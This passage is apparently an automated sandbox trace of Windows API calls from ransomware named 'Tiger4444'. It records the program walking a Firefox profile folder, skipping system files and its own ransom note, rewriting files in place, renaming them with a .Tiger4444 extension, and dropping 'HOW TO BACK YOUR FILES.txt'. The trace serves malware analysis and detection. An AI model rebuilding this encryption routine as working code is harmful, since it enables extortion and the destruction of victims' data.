lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75328 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75328 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752c8 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752c8 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75308 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75308 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752b8 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752b8 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0053.180] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0053.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0053.181] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0053.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0053.181] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753b8 [0053.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753b8 | out: hHeap=0xc50000) returned 1 [0053.181] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0053.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0053.181] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0053.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0053.181] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0053.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0053.181] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0053.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0053.181] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0053.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0053.181] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753b8 [0053.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753b8 | out: hHeap=0xc50000) returned 1 [0053.181] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0053.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0053.181] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0053.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0053.181] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752c8 [0053.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752c8 | out: hHeap=0xc50000) returned 1 [0053.181] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0053.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0053.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc871c8 | out: hHeap=0xc50000) returned 1 [0053.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc92b40 | out: hHeap=0xc50000) returned 1 [0053.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc92928 | out: hHeap=0xc50000) returned 1 [0053.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc92d50 | out: hHeap=0xc50000) returned 1 [0053.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73c48 | out: hHeap=0xc50000) returned 1 [0053.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0053.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89de8 | out: hHeap=0xc50000) returned 1 [0053.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0053.181] QueryPerformanceCounter (in: lpPerformanceCount=0x31abe58 | out: lpPerformanceCount=0x31abe58*=14463457700) returned 1 [0053.182] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0053.182] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d90 | out: hHeap=0xc50000) returned 1 [0053.182] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0053.182] CloseHandle (hObject=0x2ac) returned 1 [0053.182] CloseHandle (hObject=0x2c8) returned 1 [0053.182] wsprintfW (in: param_1=0x31ac158, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt.Tiger4444") returned 121 [0053.182] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\license.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\license.txt.tiger4444"), dwFlags=0x1) returned 1 [0053.182] InterlockedExchangeAdd (in: Addend=0xc6f840, Value=480 | out: Addend=0xc6f840) returned 0 [0053.182] InterlockedExchangeAdd (in: Addend=0xc6f84c, Value=17 | out: Addend=0xc6f84c) returned 0 [0053.182] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x31ade78 | out: lpFindFileData=0x31ade78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b6f737, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x7c375100, ftLastAccessTime.dwHighDateTime=0x1d1deb2, ftLastWriteTime.dwLowDateTime=0x7c375100, ftLastWriteTime.dwHighDateTime=0x1d1deb2, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x0, dwReserved1=0x0, cFileName="manifest.json", cAlternateFileName="MANIFE~1.JSO")) returned 1 [0053.183] lstrcmpiW (lpString1="manifest.json", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.183] lstrcmpiW (lpString1="manifest.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.183] lstrcmpiW (lpString1="manifest.json", lpString2="Tiger4444.exe") returned -1 [0053.183] lstrcmpiW (lpString1="manifest.json", lpString2=".") returned 1 [0053.183] lstrcmpiW (lpString1="manifest.json", lpString2="..") returned 1 [0053.183] lstrcmpiW (lpString1="manifest.json", lpString2="windows") returned -1 [0053.183] lstrcmpiW (lpString1="manifest.json", lpString2="bootmgr") returned 1 [0053.183] lstrcmpiW (lpString1="manifest.json", lpString2="pagefile.sys") returned -1 [0053.183] lstrcmpiW (lpString1="manifest.json", lpString2="boot") returned 1 [0053.183] lstrcmpiW (lpString1="manifest.json", lpString2="ids.txt") returned 1 [0053.183] lstrcmpiW (lpString1="manifest.json", lpString2="NTUSER.DAT") returned -1 [0053.183] lstrcpyW (in: lpString1=0x31aea90, lpString2="manifest.json" | out: lpString1="manifest.json") returned="manifest.json" [0053.183] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json", dwFileAttributes=0x0) returned 1 [0053.184] lstrlenW (lpString="manifest.json") returned 13 [0053.184] lstrlenW (lpString="Tiger4444") returned 9 [0053.184] lstrcmpiW (lpString1="fest.json", lpString2="Tiger4444") returned -1 [0053.184] lstrlenW (lpString=".dll") returned 4 [0053.184] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0053.184] lstrlenW (lpString=".lnk") returned 4 [0053.184] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0053.184] lstrlenW (lpString=".ini") returned 4 [0053.184] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0053.184] lstrlenW (lpString=".sys") returned 4 [0053.184] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0053.184] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0053.184] QueryPerformanceFrequency (in: lpFrequency=0x31abe48 | out: lpFrequency=0x31abe48*=100000000) returned 1 [0053.184] QueryPerformanceCounter (in: lpPerformanceCount=0x31abe50 | out: lpPerformanceCount=0x31abe50*=14463728010) returned 1 [0053.184] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x31abea8 | out: lpFileSize=0x31abea8*=348) returned 1 [0053.184] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0053.184] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71510 [0053.184] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x460, lpName=0x0) returned 0x2ac [0053.186] MapViewOfFile (hFileMappingObject=0x2ac, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x460) returned 0xc20000 [0053.190] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0053.190] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0053.190] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0053.190] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0053.190] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc89de8 [0053.190] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0053.190] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89de8 | out: hHeap=0xc50000) returned 1 [0053.190] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0053.190] QueryPerformanceCounter (in: lpPerformanceCount=0x31abe58 | out: lpPerformanceCount=0x31abe58*=14464324880) returned 1 [0053.190] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0053.190] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71510 | out: hHeap=0xc50000) returned 1 [0053.190] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0053.190] CloseHandle (hObject=0x2ac) returned 1 [0053.190] CloseHandle (hObject=0x2c8) returned 1 [0053.190] wsprintfW (in: param_1=0x31ac158, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json.Tiger4444") returned 123 [0053.191] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json.tiger4444"), dwFlags=0x1) returned 1 [0053.191] InterlockedExchangeAdd (in: Addend=0xc6f840, Value=352 | out: Addend=0xc6f840) returned 480 [0053.191] InterlockedExchangeAdd (in: Addend=0xc6f84c, Value=5 | out: Addend=0xc6f84c) returned 17 [0053.191] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x31ade78 | out: lpFindFileData=0x31ade78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5afcaea, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x7c375100, ftLastAccessTime.dwHighDateTime=0x1d1deb2, ftLastWriteTime.dwLowDateTime=0x7c375100, ftLastWriteTime.dwHighDateTime=0x1d1deb2, nFileSizeHigh=0x0, nFileSizeLow=0x58adf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="widevinecdm.dll", cAlternateFileName="WIDEVI~1.DLL")) returned 1 [0053.191] lstrcmpiW (lpString1="widevinecdm.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.191] lstrcmpiW (lpString1="widevinecdm.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.191] lstrcmpiW (lpString1="widevinecdm.dll", lpString2="Tiger4444.exe") returned 1 [0053.191] lstrcmpiW (lpString1="widevinecdm.dll", lpString2=".") returned 1 [0053.191] lstrcmpiW (lpString1="widevinecdm.dll", lpString2="..") returned 1 [0053.192] lstrcmpiW (lpString1="widevinecdm.dll", lpString2="windows") returned -1 [0053.192] lstrcmpiW (lpString1="widevinecdm.dll", lpString2="bootmgr") returned 1 [0053.192] lstrcmpiW (lpString1="widevinecdm.dll", lpString2="pagefile.sys") returned 1 [0053.192] lstrcmpiW (lpString1="widevinecdm.dll", lpString2="boot") returned 1 [0053.192] lstrcmpiW (lpString1="widevinecdm.dll", lpString2="ids.txt") returned 1 [0053.192] lstrcmpiW (lpString1="widevinecdm.dll", lpString2="NTUSER.DAT") returned 1 [0053.192] lstrcpyW (in: lpString1=0x31aea90, lpString2="widevinecdm.dll" | out: lpString1="widevinecdm.dll") returned="widevinecdm.dll" [0053.192] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll", dwFileAttributes=0x0) returned 1 [0053.192] lstrlenW (lpString="widevinecdm.dll") returned 15 [0053.192] lstrlenW (lpString="Tiger4444") returned 9 [0053.192] lstrcmpiW (lpString1="necdm.dll", lpString2="Tiger4444") returned -1 [0053.192] lstrlenW (lpString=".dll") returned 4 [0053.192] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0053.192] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x31ade78 | out: lpFindFileData=0x31ade78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5afb75b, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x7c375100, ftLastAccessTime.dwHighDateTime=0x1d1deb2, ftLastWriteTime.dwLowDateTime=0x7c375100, ftLastWriteTime.dwHighDateTime=0x1d1deb2, nFileSizeHigh=0x0, nFileSizeLow=0x998, dwReserved0=0x0, dwReserved1=0x0, cFileName="widevinecdm.dll.lib", cAlternateFileName="WIDEVI~1.LIB")) returned 1 [0053.192] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.192] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.192] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="Tiger4444.exe") returned 1 [0053.192] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2=".") returned 1 [0053.192] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="..") returned 1 [0053.192] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="windows") returned -1 [0053.192] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="bootmgr") returned 1 [0053.192] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="pagefile.sys") returned 1 [0053.192] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="boot") returned 1 [0053.192] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="ids.txt") returned 1 [0053.192] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="NTUSER.DAT") returned 1 [0053.192] lstrcpyW (in: lpString1=0x31aea90, lpString2="widevinecdm.dll.lib" | out: lpString1="widevinecdm.dll.lib") returned="widevinecdm.dll.lib" [0053.192] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib", dwFileAttributes=0x0) returned 1 [0053.193] lstrlenW (lpString="widevinecdm.dll.lib") returned 19 [0053.193] lstrlenW (lpString="Tiger4444") returned 9 [0053.193] lstrcmpiW (lpString1="m.dll.lib", lpString2="Tiger4444") returned -1 [0053.193] lstrlenW (lpString=".dll") returned 4 [0053.193] lstrcmpiW (lpString1=".lib", lpString2=".dll") returned 1 [0053.193] lstrlenW (lpString=".lnk") returned 4 [0053.193] lstrcmpiW (lpString1=".lib", lpString2=".lnk") returned -1 [0053.193] lstrlenW (lpString=".ini") returned 4 [0053.193] lstrcmpiW (lpString1=".lib", lpString2=".ini") returned 1 [0053.193] lstrlenW (lpString=".sys") returned 4 [0053.193] lstrcmpiW (lpString1=".lib", lpString2=".sys") returned -1 [0053.193] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0053.193] QueryPerformanceFrequency (in: lpFrequency=0x31abe48 | out: lpFrequency=0x31abe48*=100000000) returned 1 [0053.193] QueryPerformanceCounter (in: lpPerformanceCount=0x31abe50 | out: lpPerformanceCount=0x31abe50*=14464613800) returned 1 [0053.193] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x31abea8 | out: lpFileSize=0x31abea8*=2456) returned 1 [0053.193] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0053.193] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71510 [0053.193] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xca0, lpName=0x0) returned 0x2ac [0053.194] MapViewOfFile (hFileMappingObject=0x2ac, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xca0) returned 0xc20000 [0053.213] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0053.213] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0053.213] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0053.213] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0053.213] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc871c8 [0053.214] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0053.214] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc871c8 | out: hHeap=0xc50000) returned 1 [0053.214] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0053.214] QueryPerformanceCounter (in: lpPerformanceCount=0x31abe58 | out: lpPerformanceCount=0x31abe58*=14466673208) returned 1 [0053.214] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0053.214] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71510 | out: hHeap=0xc50000) returned 1 [0053.214] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0053.214] CloseHandle (hObject=0x2ac) returned 1 [0053.214] CloseHandle (hObject=0x2c8) returned 1 [0053.214] wsprintfW (in: param_1=0x31ac158, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib.Tiger4444") returned 129 [0053.214] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib.tiger4444"), dwFlags=0x1) returned 1 [0053.216] InterlockedExchangeAdd (in: Addend=0xc6f840, Value=2464 | out: Addend=0xc6f840) returned 832 [0053.216] InterlockedExchangeAdd (in: Addend=0xc6f84c, Value=20 | out: Addend=0xc6f84c) returned 22 [0053.216] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x31ade78 | out: lpFindFileData=0x31ade78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5afb75b, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x7c375100, ftLastAccessTime.dwHighDateTime=0x1d1deb2, ftLastWriteTime.dwLowDateTime=0x7c375100, ftLastWriteTime.dwHighDateTime=0x1d1deb2, nFileSizeHigh=0x0, nFileSizeLow=0x998, dwReserved0=0x0, dwReserved1=0x0, cFileName="widevinecdm.dll.lib", cAlternateFileName="WIDEVI~1.LIB")) returned 0 [0053.216] FindClose (in: hFindFile=0xc73048 | out: hFindFile=0xc73048) returned 1 [0053.216] lstrcpyW (in: lpString1=0x31aea90, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.216] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0053.217] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0053.217] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xc20000 [0053.218] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0053.218] CloseHandle (hObject=0x2c8) returned 1 [0053.218] CloseHandle (hObject=0x260) returned 1 [0053.218] GetCurrentThreadId () returned 0xc04 [0053.218] RtlInterlockedPopEntrySList (in: ListHead=0xc66628 | out: ListHead=0xc66628) returned 0x0 [0053.218] GetCurrentThreadId () returned 0xc04 [0053.218] WaitForMultipleObjects (nCount=0x0, lpHandles=0x31ae0c8*=0x0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0xffffffff [0053.218] RtlInterlockedPopEntrySList (in: ListHead=0xc66628 | out: ListHead=0xc66628) returned 0x0 [0053.218] RtlInterlockedFlushSList (in: ListHead=0xc66628 | out: ListHead=0xc66628) returned 0x0 [0053.218] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66620 | out: hHeap=0xc50000) returned 1 [0053.218] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc6f830 | out: hHeap=0xc50000) returned 1 [0053.218] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc921d0 | out: hHeap=0xc50000) returned 1 [0053.218] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc86fb8 | out: hHeap=0xc50000) returned 1 [0053.218] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0053.218] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d350 | out: hHeap=0xc50000) returned 1 Thread: id = 18 os_tid = 0xdc8 [0053.196] lstrlenA (lpString="iC Gb VX Zh d4 dF EH lq R1 oD zQ zh dS Oc k3 dm\r\n9k Vz Az EZ Zx UB 9r Ud yE Oj Xr 4q 42 a+ zy a1\r\n9A 7g QA kp 6T FO KU Vd I/ PB 1A vf 1H gB gL h6\r\nK7 qa 0G A+ ox 7Q Vw Hx Dw 7/ EY 7n fC /C jg 